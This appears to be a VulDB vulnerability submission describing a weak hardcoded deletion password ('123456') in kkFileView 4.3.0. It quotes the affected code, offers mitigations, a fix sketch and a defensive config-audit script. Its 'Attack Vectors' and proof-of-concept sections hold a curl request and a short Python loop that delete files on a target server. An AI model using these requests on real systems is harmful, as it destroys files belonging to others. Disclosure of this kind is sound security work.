Submit #665593: kkFileView 4.3.0 Weak Password Requirements

Title: kkFileView 4.3.0 Weak Password Requirements
Description:

**Title**: kkFileView 4.3.0 - Weak Authentication in File Deletion Function Leading to Arbitrary File Deletion
**Product**: kkFileView
**Version**: 4.3.0

---

### Vulnerability Details

#### Description

kkFileView version 4.3.0 contains a weak authentication mechanism in the file deletion functionality. The application uses a hardcoded default password "123456" for file deletion operations, which can be easily guessed or brute-forced by attackers. This vulnerability allows unauthenticated remote attackers to delete arbitrary files within the application's file storage directory without proper authorization.

#### Technical Details

The vulnerability exists in the `/deleteFile` endpoint of the FileController class:

**Vulnerable Code Location**: `server/src/main/java/cn/keking/web/controller/FileController.java`

```java
@GetMapping("/deleteFile")
public ReturnResponse<Object> deleteFile(String fileName, String password) {
    // ... validation ...
    // case-insensitive comparison against the configured password (default "123456")
    if (!ConfigConstants.getPassword().equalsIgnoreCase(password)) {
        logger.error("删除文件【{}】失败,密码错误!", fileName);
        return ReturnResponse.failure("删除文件失败,密码错误!");
    }
    // ... file deletion logic ...
}
```

**Default Password Configuration**: `server/src/main/config/application.properties`

```properties
# deletion password
delete.password = ${KK_DELETE_PASSWORD:123456}
```

**Password Constant**: `server/src/main/java/cn/keking/config/ConfigConstants.java`

```java
public static final String DEFAULT_PASSWORD = "123456";
```

#### Attack Vectors

1. **Direct HTTP Request**:

   ```bash
   curl "http://target:8012/deleteFile?fileName=ZGVtby90ZXN0LnBkZg==&password=123456"
   ```

2. **Automated Attack Script**:

   ```python
   import base64
   import requests

   target = "http://target:8012"
   files = ["demo/test.pdf", "demo/document.docx"]
   for file in files:
       # the fileName parameter is the base64-encoded relative path
       encoded = base64.b64encode(file.encode()).decode()
       requests.get(f"{target}/deleteFile?fileName={encoded}&password=123456")
   ```

#### Impact

- **Confidentiality**: No direct impact
- **Integrity**: High - Attackers can delete uploaded files
- **Availability**: Medium - Can disrupt file preview services
- **Authentication**: Complete bypass of deletion authorization

#### Affected Components

- File deletion endpoint: `/deleteFile`
- Default configuration files
- Password validation logic

---

### Proof of Concept

#### Step-by-Step Reproduction

1. Deploy kkFileView 4.3.0 with default configuration
2. Upload a test file using the `/fileUpload` endpoint
3. Obtain the file list using the `/listFiles` endpoint
4. Delete any file using the default password "123456":

   ```bash
   curl "http://localhost:8012/deleteFile?fileName=ZGVtby90ZXN0LnBkZg==&password=123456"
   ```

#### Expected Result

File deletion should require proper authentication.

#### Actual Result

Files can be deleted using the weak default password.

---

### Solution

#### Immediate Mitigation

1. Change the default password in `application.properties`:

   ```properties
   delete.password = strong_unique_password_here
   ```

2. Disable file deletion if not required:

   ```properties
   file.upload.disable = true
   ```

#### Recommended Fix

1. Implement a proper user authentication system
2. Use strong password policies
3. Add rate limiting to prevent brute-force attacks
4. Implement audit logging for deletion operations
5. Use cryptographically secure tokens instead of passwords

#### Code Fix Example

```java
// Replace the weak password check with proper authentication.
// isAuthenticated() and hasDeletePermission() are placeholders for the
// application's session and authorization checks.
@GetMapping("/deleteFile")
public ReturnResponse<Object> deleteFile(String fileName, HttpServletRequest request) {
    if (!isAuthenticated(request)) {
        return ReturnResponse.failure("Authentication required");
    }
    if (!hasDeletePermission(request)) {
        return ReturnResponse.failure("Insufficient permissions");
    }
    // ... proceed with deletion ...
}
```
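The configuration audit below is an added example for the Immediate Mitigation steps; it is not code from this submission or from kkFileView. It parses an `application.properties` file, resolves the `${KK_DELETE_PASSWORD:123456}` placeholder the way Spring's `${VAR:default}` syntax does (an assumption about the resolver), and reports whether `delete.password` still resolves to the weak default or to a value shorter than an assumed 12-character minimum.

```python
"""Audit kkFileView's delete.password setting (added example, assumptions noted)."""
import os
import re

WEAK_DEFAULT = "123456"   # ConfigConstants.DEFAULT_PASSWORD as quoted in the submission
MIN_LEN = 12              # assumed local policy, not a kkFileView requirement
# ${VAR} or ${VAR:default}; assumed to match Spring's placeholder syntax
PLACEHOLDER = re.compile(r"^\$\{(?P<var>[A-Za-z_][A-Za-z0-9_]*)(?::(?P<default>.*))?\}$")


def parse_properties(text):
    """Minimal .properties parser: 'key = value' lines, '#'/'!' comments skipped."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def resolve(value, env):
    """Resolve ${VAR:default} against env; returns None if VAR is unset and has no default."""
    m = PLACEHOLDER.match(value)
    if not m:
        return value
    return env.get(m.group("var"), m.group("default"))


def audit(text, env=None):
    """Return a list of findings about the effective deletion password."""
    env = os.environ if env is None else env
    props = parse_properties(text)
    # Mitigation 2 from the submission: with uploads disabled the deletion path is not exposed
    if props.get("file.upload.disable", "").lower() == "true":
        return []
    raw = props.get("delete.password")
    if raw is None:
        return ["delete.password absent from the file"]
    pw = resolve(raw, env)
    if not pw:
        return ["delete.password resolves to an empty value"]
    if pw == WEAK_DEFAULT:
        return ["delete.password resolves to the weak default 123456"]
    if len(pw) < MIN_LEN:
        return [f"delete.password shorter than {MIN_LEN} characters"]
    return []


if __name__ == "__main__":
    # constructed sample mirroring the shipped default shown in the submission
    sample = "# deletion password\ndelete.password = ${KK_DELETE_PASSWORD:123456}\n"
    print(audit(sample, env={}) or "no findings")
```

Run it against the deployed `application.properties` with the service's real environment so the `KK_DELETE_PASSWORD` override is taken into account.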
Source: https://github.com/rassec2/kkfile/edit/main/4.3kkfile.md
User: yudeshui (UID 91129)
Submission: 09/30/2025 09:24 (7 months ago)
Moderation: 10/19/2025 04:53 (19 days later)
Status: Duplicate
VulDB entry: 207741 [kkFileView 4.0.0 FileController.java fileName denial of service]
Reason: Product not identifiable. Please reply with name and website of the affected product.
Points: 0
